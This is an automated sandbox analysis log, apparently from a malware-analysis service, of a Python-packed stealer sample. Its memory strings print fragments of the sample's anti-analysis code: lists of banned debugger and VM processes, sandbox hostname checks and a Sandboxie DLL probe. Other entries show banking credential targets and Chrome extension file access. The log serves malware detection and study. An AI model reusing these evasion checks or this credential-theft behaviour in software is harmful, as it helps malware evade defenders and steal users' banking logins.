            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELF.BANNED_PROCESS = ["HTTP TOOLKIT.EXE", "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "FIDDLER.EXE", "REGEDIT.EXE", "TASKMGR.EXE", "VBOXSERVICE.EXE", "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "SBIEDLL.DLL"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "VMUSRVC.EXE"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: VMUSRVC.EXE0O
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "SBIEDLL.DLL"PM
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "XENSERVICE.EXE"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "OLLYDBG.EXE"0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "XENSERVICE.EXE", # XEN
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OLLYDBG.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: VMUSRVC.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "PROCESSHACKER.EXE"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "WIRESHARK.EXE"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "XENSERVICE.EXE"0W
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: FIDDLER.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "OLLYDBG.EXE"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLLP@
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "FIDDLER.EXE"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: XENSERVICE.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "VMUSRVC.EXE"P
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OLLYDBG.EXEPL
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HANDLE = CTYPES.WINDLL.LOADLIBRARY("SBIEDLL.DLL")
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 2_2_00007FFD93D132F6 rdtsc 2_2_00007FFD93D132F6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (repeated 4 times)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2885
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 971
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4517
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1734
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_queue.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_writer.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_ssl.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\unicodedata.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\multidict\_multidict.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\python3.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\python310.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_parser.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\select.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_overlapped.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_ctypes.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_hashlib.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_multiprocessing.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\propcache\_helpers_c.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_websocket.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist\_frozenlist.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings\_rust.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_helpers.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_socket.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_cffi_backend.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_bz2.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_lzma.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_sqlite3.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\yarl\_quoting_c.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_decimal.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_asyncio.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_uuid.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\pyexpat.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Check user administrative privileges: GetTokenInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | API coverage: 4.8 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2948 | Thread sleep count: 2885 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4544 | Thread sleep count: 971 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6556 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 988 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3268 | Thread sleep count: 4517 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3268 | Thread sleep count: 1734 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 280 | Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5792 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\netsh.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (repeated 2 times)
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (repeated 16 times)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7B2B683C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B69280 FindFirstFileExW,FindClose,0_2_00007FF7B2B69280
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7B2B81874
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FF7B2B69280 FindFirstFileExW,FindClose,2_2_00007FF7B2B69280
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FF7B2B683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7B2B683C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FF7B2B81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7B2B81874
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D13229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFDB222F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,2_2_00007FFD93D13229
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior
            Source: HOSTNAME.EXE, 00000034.00000002.2218372645.000002C49D039000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllFFD
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: *Hyper-V Administrators
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "vboxservice.exe", # VirtualBox
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "vmsrvc.exe", # VirtualBox
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vboxtray.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: b"vmware"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareuser.exe
            Source: sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mesyncHyper-V Guest Shutdown ServicevmicshutdownHyper-V Remote Desktop Virtualization ServicevmicrdvHyper-V Data Exchange ServicevmickvpexchangeN
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "vmtoolsd.exe", # VMware
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 'qemu'C
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwaretray.exe0~
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: [1VMware
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vboxservice.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: b"vmware"Ph
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmtoolsd.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmware"
            Source: NETSTAT.EXE, 00000047.00000002.2257640995.000001D25C958000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmtoolsd.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SERVICE_NAME: vmicheartbeat
            Source: sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SERVICE_NAME: vmicvss
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmsrvc.exe"@W
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SERVICE_NAME: vmicshutdown
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2417097978.0000018B495CA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hostNames = ['sandbox','cuckoo', 'vm', 'virtual', 'qemu', 'vbox', 'xen']
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmsrvc.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmwareuser.exe"0m
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmsrvc.exeP
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: if b'VMware' in stdout:
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
